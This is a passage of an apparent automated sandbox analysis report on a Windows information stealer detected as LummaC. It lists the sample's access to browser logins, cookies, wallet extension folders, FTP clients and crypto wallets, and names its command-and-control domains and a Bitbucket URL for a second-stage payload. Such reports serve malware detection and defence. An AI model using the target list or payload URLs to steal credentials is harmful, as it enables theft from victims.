                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: Yara matchFile source: Process Memory Space: fnCae9FQhg.exe PID: 404, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: fnCae9FQhg.exe PID: 404, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		2
                Process Injection                		44
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                Query Registry                		Remote Services1
                Archive Collected Data                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		2
                Process Injection                		LSASS Memory851
                Security Software Discovery                		Remote Desktop Protocol4
                Data from Local System                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts1
                PowerShell                		Logon Script (Windows)Logon Script (Windows)11
                Deobfuscate/Decode Files or Information                		Security Account Manager44
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook5
                Obfuscated Files or Information                		NTDS2
                Process Discovery                		Distributed Component Object ModelInput Capture114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                Software Packing                		LSA Secrets223
                System Information Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                fnCae9FQhg.exe47%ReversingLabsWin32.Infostealer.Tinba
                fnCae9FQhg.exe100%AviraTR/Crypt.TPM.Gen
                fnCae9FQhg.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://observerfry.lat/apix=00%Avira URL Cloudsafe
                https://observerfry.lat/apiype-0%Avira URL Cloudsafe
                https://observerfry.lat/ksp;0%Avira URL Cloudsafe
                https://observerfry.lat/apie30%Avira URL Cloudsafe
                https://observerfry.lat/apiC0%Avira URL Cloudsafe
                https://observerfry.lat/apibP0%Avira URL Cloudsafe
                https://observerfry.lat/r8;0%Avira URL Cloudsafe
                https://observerfry.lat/ic0%Avira URL Cloudsafe
                https://observerfry.lat/ks(;0%Avira URL Cloudsafe
                https://observerfry.lat/es0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                s3-w.us-east-1.amazonaws.com
                		16.182.108.137
                		truefalse
                  		high
                  bitbucket.org
                  		185.166.143.48
                  		truefalse
                    		high
                    observerfry.lat
                    		104.21.36.201
                    		truefalse
                      		high
                      bbuseruploads.s3.amazonaws.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        slipperyloo.latfalse
                          		high
                          curverpluch.latfalse
                            		high
                            tentabatte.latfalse
                              		high
                              manyrestro.latfalse
                                		high
                                bashfulacid.latfalse
                                  		high
                                  https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exefalse
                                    		high
                                    observerfry.latfalse
                                      		high
                                      wordyfindy.latfalse
                                        		high
                                        https://observerfry.lat/apifalse
                                          		high
                                          shapestickyr.latfalse
                                            		high
                                            talkynicer.latfalse
                                              		high

                                              URLs from Memory and Binaries

                                              NameSourceMaliciousAntivirus DetectionReputation
                                              https://duckduckgo.com/chrome_newtabfnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0fnCae9FQhg.exe, 00000001.00000002.2570223927.000000000085A000.00000004.00000010.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://observerfry.lat/pifnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://observerfry.lat/r8;fnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=fnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgfnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.netfnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://remote-app-switcher.prod-east.frontend.public.atl-paas.netfnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://x1.c.lencr.org/0fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://x1.i.lencr.org/0fnCae9FQhg.exe, 00000001.00000003.2309216569.00000000057F3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aui-cdn.atlassian.com/fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://observerfry.lat/apie3fnCae9FQhg.exe, 00000001.00000003.2361076263.0000000000979000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-fnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://support.mozilla.org/products/firefoxgro.allfnCae9FQhg.exe, 00000001.00000003.2310692867.00000000058DF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://observerfry.lat/ksp;fnCae9FQhg.exe, 00000001.00000003.2365135377.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2414674758.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                https://www.mozilla.orfnCae9FQhg.exe, 00000001.00000003.2311059794.00000000057EF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://observerfry.lat/apix=0fnCae9FQhg.exe, 00000001.00000002.2570241622.0000000000915000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://observerfry.lat/esfnCae9FQhg.exe, 00000001.00000003.2361173008.000000000096E000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2364529673.000000000096E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.netfnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icofnCae9FQhg.exe, 00000001.00000003.2256988736.000000000580B000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2255629205.000000000580E000.00000004.00000800.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000003.2258466145.000000000580B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.fnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifnCae9FQhg.exe, 00000001.00000003.2311137046.00000000057CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://web-security-reports.services.atlassian.com/csp-report/bb-websitefnCae9FQhg.exe, 00000001.00000003.2506669532.0000000000953000.00000004.00000020.00020000.00000000.sdmp, fnCae9FQhg.exe, 00000001.00000002.2573222229.00000000057C0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
